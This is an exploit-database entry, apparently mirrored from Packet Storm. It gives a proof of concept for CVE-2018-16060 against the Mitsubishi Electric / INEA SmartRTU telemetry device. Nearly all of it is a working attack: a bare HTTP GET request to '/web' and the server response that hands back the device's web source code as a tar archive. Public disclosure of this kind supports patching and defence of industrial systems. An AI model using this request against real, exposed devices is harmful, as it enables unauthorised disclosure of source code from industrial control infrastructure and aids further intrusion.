Exploit for Mitsubishi Electric / INEA SmartRTU Source Code Disclosure CVE-2018-16060

## https://sploitus.com/exploit?id=PACKETSTORM:164538
# Exploit Title: Mitsubishi Electric & INEA SmartRTU - Source Code Disclosure  
# Date: 2021-17-10  
# Exploit Author: Hamit CİBO  
# Vendor Homepage: https://www.inea.si  
# Software Link: https://www.inea.si/telemetrija-in-m2m-produkti/mertu/  
# Version: ME RTU  
# Tested on: Windows  
# CVE : CVE-2018-16060  
  
  
# PoC  
# Request  
  
GET /web HTTP/1.1  
Host: **.**.**.***  
Accept-Encoding: gzip, deflate  
Accept: */*  
Accept-Language: en  
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64;  
x64; Trident/5.0)  
Connection: close  
  
# Response  
  
HTTP/1.1 200 OK  
Date: Wed, 08 Aug 2018 08:09:53 GMT  
Server: Apache/2.4.7 (Ubuntu)  
Content-Location: web.tar  
Vary: negotiate  
TCN: choice  
Last-Modified: Wed, 19 Nov 2014 09:40:36 GMT  
ETag: "93800-5083300f58d00;51179459a2c00"  
Accept-Ranges: bytes  
Content-Length: 604160  
Connection: close  
Content-Type: application/x-tar  
  
  
Reference :  
  
https://drive.google.com/open?id=1QMHwTnBbIqrTkR0NEpnTKssYdi8vRsHH